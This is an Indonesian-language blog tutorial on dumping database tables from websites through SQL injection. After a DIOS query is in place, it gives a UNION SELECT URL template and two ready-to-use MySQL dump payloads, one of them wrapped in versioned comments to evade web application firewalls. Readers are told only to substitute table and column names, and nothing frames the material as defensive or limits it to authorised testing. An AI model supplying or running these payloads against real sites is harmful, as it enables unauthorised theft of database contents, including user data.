Dump Tabel pada SQL injection

Dump Tabel or Data pada Web - Seperti judul di atas, di artikel ini saya akan membagikan sebuah cara untuk nge-dump tabel pada SQL injection.

Cara ini bisa dilakukan apabila kalian sudah menaruh dios kalian di angka ajaib kemudian muncul tabel-tabel dan column. Langsung aja liat tutorialnya!

Peratama

Pastikan kalian sudah menaruh dios untuk memunculkan sebuah tabel dan columnnya. Lihat gambar di bawah!

Kedua

Masukan payload dump di angka yang sudah kalian taruh dios sebelumnya. 

Contoh :

Sebelum di dump

        • site.com/+and+0+union+select+1,2,<dios pada cara pertama>,4--+-

Sesudah di dump

        • site.com/+and+0+union+select+1,2,<payload>,4--+-

Payload dump : 

        • Type biasa => (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(nama tabel)WHERE(@x)IN(@x:=CONCAT(0x20,@x,column1,0x203a3a20,column2,0x3c62723e))))x)

        • Type WAF => (/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(nama_tabel)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,column1,0x203a3a20,column2,0x3c62723e))))x)

Perhatikan payload di atas, yang harus kalian ganti adalah nama_tabel,column1,column2. Bagaimana cara menggantinya? mudah saja, kalian tinggal lihat pada web yang sudah kalian taruh dios. Disitu terdapat sebuah tabel dan columnnya.

sekian, semoga bermanfaat. Jika kurang jelas kalian silahkan chat saya di Instagram: @that1akbar